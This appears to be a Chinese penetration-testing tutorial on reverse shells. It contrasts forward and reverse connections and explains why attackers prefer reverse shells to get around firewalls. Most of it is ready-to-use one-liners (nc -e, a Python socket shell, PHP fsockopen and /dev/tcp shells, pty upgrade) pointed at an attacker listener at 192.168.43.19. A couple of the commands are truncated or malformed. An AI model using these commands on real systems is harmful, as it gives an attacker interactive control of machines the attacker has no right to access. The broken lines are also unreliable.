反弹Shell

常见一句话反弹Shell

反弹攻击机开监听端口,靶机主动去连

正弹靶机开启端口,攻击机去主动去连

正向连接

正向shell:客户端(我)想要获得服务端的shell

假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。

反向连接

反向shell:**受害者的shell(权限)弹到攻击机上

  • 场景模拟
    • 假设小黑是一名黑客
    • 他悄咪咪溜进了知乎总部大楼,发现一台刘看山的电脑,但是刘看山出门了
    • 小黑发现电脑里有一个有趣的文件(刘看山的秘密)
    • 小黑下载这个文件到自己的U盘里,又悄咪咪的原路返航
    • 回到家后,小黑打开这个文件
    • 发现电脑被刘看山控制了~
    • (这里小黑是客户端,刘看山是服务端,客户端发射shell)

那么为什么要用反弹shell呢?

反弹shell通常适用于如下几种情况:

•目标机因防火墙受限,目标机器只能发送请求,不能接收请求。•目标机端口被占用。•目标机位于局域网,或IP会动态变化,攻击机无法直接连接。•对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知的。•..

对于以上几种情况,我们是无法利用正向连接的,要用反向连接。

那么反向连接就很好理解了,就是攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,即为反向连接。

反弹shell命令

得到shell一方(攻击机)只需要开启一个口子(监听端口),给shell一方(靶机)主动去找我们这个口子(监听端口),找口子所填写的地址端口都是攻击机的


kali开启监听端口,靶机主动连接后将shell反弹给攻击机

CentOS7  192.168.43.186

kali   192.168.43.19

nc

攻击机开启监听5555端口,等待靶机主动连接并反弹shell

nc -lvp 5555

靶机连接攻击机并将shell反弹过去 ,这样在攻击机上就可以执行靶机系统中命令

// 建立一个反向Shell连接,将远程主机的Shell连接到本地的/bin/bash程序
// Bash是一种命令行解释器,用户可以通过它执行各种命令 类似于windows的cmd

nc -e /bin/bash 192.168.43.19 5555  // 反弹到攻击机开启的5555端口上

bash shell

反弹bash shell命令详解

攻击机开启监听7777端口,等待靶机主动连接并反弹shell

nc -lvp 7777

靶机执行此命令,填写的IP是攻击

// 将自身的bash面板(cmd)重定向到攻击机的7777端口上

/d


bash -i是创建一个交互的bash shell

/dev/tcp/是bach实现网络请求的一个接口,打开这个文件就相当于发出了一个socket调用,建立一个socket连接

python

攻击机开启监听6666端口,等待靶机主动连接并反弹shell

nc -lvp 6666

靶机存在Python环境输入此命令修改IP端口即可

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.43.19',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

php

攻击机开启监听4444端口,等待靶机主动连接并反弹shell

nc -lvp 4444

靶机输入此命令即可反弹,但是PHP反弹需要php关闭safe_mode这个选项,才可以使用exec函数

php- 'exec("/bin/bash -i >& /dev/tcp/192.168.43.19/4444")'

or

php -r '$sock=fsockopen("192.168.43.19",4444);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

如成功反弹后shell面板不是常规的调用此命令转化

python -c 'import pty;pty.spawn("/bin/bash")'
相关推荐
Suckerbin2 小时前
Hms?: 1渗透测试
学习·安全·网络安全
newxtc4 小时前
【国内中间件厂商排名及四大中间件对比分析】
安全·web安全·网络安全·中间件·行为验证·国产中间件
follycat8 小时前
[极客大挑战 2019]HTTP 1
网络·网络协议·http·网络安全
Lionhacker1 天前
网络工程师这个行业可以一直干到退休吗?
网络·数据库·网络安全·黑客·黑客技术
centos081 天前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf
程序员小予1 天前
如何成为一名黑客?小白必学的12个基本步骤
计算机网络·安全·网络安全
蜗牛学苑_武汉1 天前
Wazuh入侵检测系统的安装和基本使用
网络·网络安全
乐茵安全1 天前
linux基础
linux·运维·服务器·网络·安全·网络安全
如光照1 天前
Linux与Windows中的流量抓取工具:wireshark与tcpdump
linux·windows·测试工具·网络安全